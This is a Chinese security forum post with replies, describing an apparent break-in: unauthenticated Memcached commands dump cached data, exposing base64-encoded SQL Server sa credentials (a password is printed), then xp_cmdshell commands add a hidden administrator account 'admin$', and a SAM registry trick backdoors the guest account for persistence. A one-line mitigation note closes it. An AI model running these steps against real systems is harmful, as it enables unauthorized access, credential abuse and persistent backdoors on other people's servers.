用户
搜索
  • TA的每日心情
    奋斗
    前天 15:49
  • 签到天数: 319 天

    连续签到: 1 天

    [LV.8]以坛为家I

    i春秋-核心白帽

    Rank: 4

    1

    主题

    216

    帖子

    360

    魔法币
    收听
    1
    粉丝
    1
    注册时间
    2015-10-29

    核心白帽

    发表于 2017-6-16 14:03:07 94081
    本帖最后由 taro 于 2017-6-16 15:14 编辑

    Memcached是一套常用的key-value缓存系统,由于它本身没有权限控制模块,所以开放在外网的Memcache服务很容易被攻击者扫描发现,通过命令交互可直接读取memcache中的敏感信息。
    很多企业或者公司的memcache服务在安装使用后,还在使用着默认的安装配置,于是就有了一系列的关于memcache的未授权访问攻击。通过memcache可以获取很多关于服务器的信息。好运的我也遇到这么一处,今天就给大家讲一下吧
    memcache命令不熟悉的请参考:http://www.cnblogs.com/shi5588/p/4201700.html

    --------------------------------------淫荡的分割线,直奔主题-------------------------------------------------
    statsitems
    执行statsitems,可以看到STAT items行,如果memcached存储内容很多,那么这里也会列出很多的STAT items行。
    1497591701(1).jpg

    statscachedump  slabs_id  limit_num
    slabs_id:由stats items返回的结果(STAT items后面的数字)决定的
    limit_num:返回的记录数,0表示返回所有记录
    通过statsitems、stats cachedump slab_id limit_num配合get命令可以遍历memcached的记录。
    1497591720(1).jpg

    get value
    获取某个list的数值信息
    S7~%@EUO$W~(POFI0H]@_NQ.png

    通过截图可以看到一段缓存的关于数据库连接的账号密码,密码虽然base64加密,但是能难倒谁呢?
    1497591906(1).jpg

    数据库的账号密码通密码base64解密,发现密码为< shqt123.>通过Navicat远程连接数据库,因为是sa权限,可以直接执行cmd
    1497591936(1).jpg

    因为sqlserver的权限为sa, 所以大家都懂得,我们可以直接使用sa的权限执行系统命令
    Execmaster.dbo.xp_cmdshell 'net user admin$ !QAZ@wsx /add'
    Execmaster.dbo.xp_cmdshell 'net localgroup administrators admin$
    1497591954(1).jpg

    system权限,系统到手了,通过添加一个账户并加入administrators组,查看开放的远程端口为33389,直接登陆成功。
    1497591969(1).jpg

    可以后门然后对guest用户可以先设置用户密码,然后禁用,通过注册表修改sam文件
    把administrator的F键值复制粘贴给guest账号
    5)8RIL49`M967P[EA~)(Y@W.png
    这样guest就拥有和administarator一样的权限了,后门就可以直接的使用guest登录administrator权限了。

    关于memcache未授权访问如何修复,网上资料太多,大家一搜一大把,但是我还是要啰嗦一下:最简单的就是设置策略,现在memcache访问来源啦。

    所以我们在做运维的时候,一定要细心,很可能服务器就存在某处的疏忽而导致的安全问题,


    评分

    参与人数 1魔法币 +30 收起 理由
    风在指尖 + 30 说实话,我觉得思路很不错

    查看全部评分

    发表于 2017-6-16 15:13:44
    額,原來是通過memcache里洩露的數據庫賬號信息 鏈接數據庫進行命令執行的。。。
    還以為。。。
    我是真的不会武功
    使用道具 举报 回复
    发表于 2017-6-16 15:15:46
    常威 发表于 2017-6-16 15:13
    額,原來是通過memcache里洩露的數據庫賬號信息 鏈接數據庫進行命令執行的。。。
    還以為。。。 ...

    其实内容很简单,主要是想表面它的危害性
    使用道具 举报 回复
    发表于 2017-6-16 15:42:40
    厉害厉害
    使用道具 举报 回复
    发表于 2017-6-16 19:14:48
    赞一个
    忠于理想 面对现实
    使用道具 举报 回复
    小爱_Joker 版主 成大事者 不拘小节 楚 积极活跃奖 i春秋签约作者 爱心勋章
    5#
    发表于 2017-6-17 15:03:32
    学习了 感谢分享。
    使用道具 举报 回复
    谢谢分享
    使用道具 举报 回复
    发表于 2017-6-18 11:14:00
    memcache学习了
    使用道具 举报 回复
    发表于 2017-6-21 08:45:38
    提莫队长正在待命
    使用道具 举报 回复
    谢谢分享
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册